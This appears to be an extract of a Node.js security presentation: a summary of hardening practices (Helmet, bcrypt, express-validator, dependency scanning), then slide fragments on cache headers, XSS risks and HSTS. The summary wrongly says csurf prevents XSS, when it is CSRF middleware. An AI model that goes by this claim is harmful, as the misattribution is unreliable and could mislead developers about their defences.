The document discusses security best practices for Node.js applications. It covers using packages like Helmet to set secure HTTP headers, encrypting sessions with packages like cookie-session, preventing XSS attacks with csurf, sanitizing user input with express-validator, and encrypting passwords with bcrypt. It also discusses building secure HTTPS servers, analyzing dependencies for vulnerabilities with tools like NSP and Snyk, and using the Node Goat project to intentionally introduce vulnerabilities for testing security.
3. nodeJS introduction
JavaScript in the backend
Built on Chrome´s Javascript runtime(V8)
NodeJs is based on event loop
Designed to be asynchronous
Single Thread
Concurrent requests.
21. Delete cookies from cache browser
// Set cache control header to eliminate cookies from cache
app.use(function (req, res, next) {
res.header('Cache-Control', 'no-cache="Set-Cookie, Set-Cookie2"');
next();
});
22. XSS attacks
An attacker can exploit XSS vulnerability to:
Steal session cookies/Sesion hijacking
Redirect user to malicious sites
Defacing and content manipulation
Cross Site Request forgery
38. Building a secure HTTPS server
https://www.npmjs.com/package/https-redirect-server
https://www.npmjs.com/package/express-enforces-ssl
Redirect all traffic to https and a
secure port
40. Building a secure HTTPS server
var helmet = require("helmet");
var ms = require("ms");
app.use(helmet.hsts({
maxAge: ms("1 year"),
includeSubdomains: true
}));
Send hsts header for all requests